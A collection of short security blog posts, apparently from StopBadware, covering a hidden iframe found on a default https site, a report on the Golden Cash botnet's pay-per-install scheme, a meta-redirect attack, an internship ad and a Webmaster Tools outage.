Today we saw an interesting case where no one could find badware in a website that Google reported as infected—until Google tipped us off to check the site using https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, when we used https, an apparently unused default site loaded, along with a hidden iframe that connected to a Chinese server and downloaded a malicious payload. In addition to being difficult to track down, my colleague Oliver points out that intrusion detection systems, network firewalls, and other devices that scan traffic as it passes through a network would probably miss this malicious payload because of it being encrypted within an SSL stream.

SSL aside, default websites that are turned on by default in web servers (including those embedded in web-enabled devices) can be a security risk, as today’s case shows. Often these default sites are left enabled and are not locked down adequately, making them prime targets for attack. They can then be used as a destination URL for spam or redirects.

Lesson: when installing a web server, find out which sites are enabled by default, and either disable them or secure and monitor them.

A couple weeks ago, I wrote about a trend of websites being compromised because the webmaster’s computer had a Trojan that was stealing FTP credentials for the site. The folks at Finjan recently released a report detailing the operations of a criminal enterprise, Golden Cash, that uses this approach as an integral part of its operations. From the report (emphasis added):

How does Golden Cash operate?

1. A potential victim visits a legitimate compromised website.
2. The compromised website contains a malicious Iframe, causing the victim‟s browser to pull an exploit code from the attacker website that is armed with the exploit toolkit.
3. Upon successful exploitation, a special version of a Trojan, which was especially created for the attacker, is being pulled from the Golden Cash server.
4. Once installed, the Trojan reports back to its “master”, the Golden Cash server.
5. The attacker’s account at Golden Cash is credited with payment for the job done.
6. The first instruction sent by Golden Cash to the victim’s machine, is to install an FTP grabber to steal FTP credentials.
7. The victim’s machine is now in a pool of infected machines controlled by Golden Cash.
8. The infected machines are being offered to other cybercriminals using a dedicated website.
9. The selling prices depend on the location of the infected machines.
10. After purchase, the victim’s machine gets instructions from the buyer to install additional malware on his/her behalf.
11. The Trojan on the victim’s machine reports back to Golden Cash on successful installation of the buyer’s malware.
12. The buyer‟s account is charged by Golden Cash for the service rendered.
13. The victim‟s machine goes back in the “available for more infections” pool for more purchases.

We’re looking for one or two good interns to help us with badware website testing and to periodically chip in on QA testing of other Berkman Center websites. If you know of someone near Cambridge, MA who is available 8 to 17 hours per week, please let him or her know of this opportunity. The full description can be found here.

BadwareBusters.org community member Denis describes an emerging web-based malware attack over on his Unmask Parasites blog, and he is seeking additional information:

I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only one of them – server-wide goscanpark .com/goscansoon .com meta redirects.

[snip]

My research is not complete. I’d like to hear from owners of affected sites and from server admins of compromised web servers. You can probably provide missing information about the attack or correct me if something in my article is not accurate.  I’m also interested in any information about the vulnerability that makes this nasty attack possible. Any comments are welcome.

Far more information about the attack is available in his blog post.

Some users are reporting difficulty logging into Google’s Webmaster Tools, a console that allows website owners to do a number of Google-related tasks, including requesting a review after removing malware from a site. Google is aware of the issue and is "looking into it."

Meanwhile, if you are trying to request a review and are unable to access Webmaster Tools, you may submit a review request through StopBadware.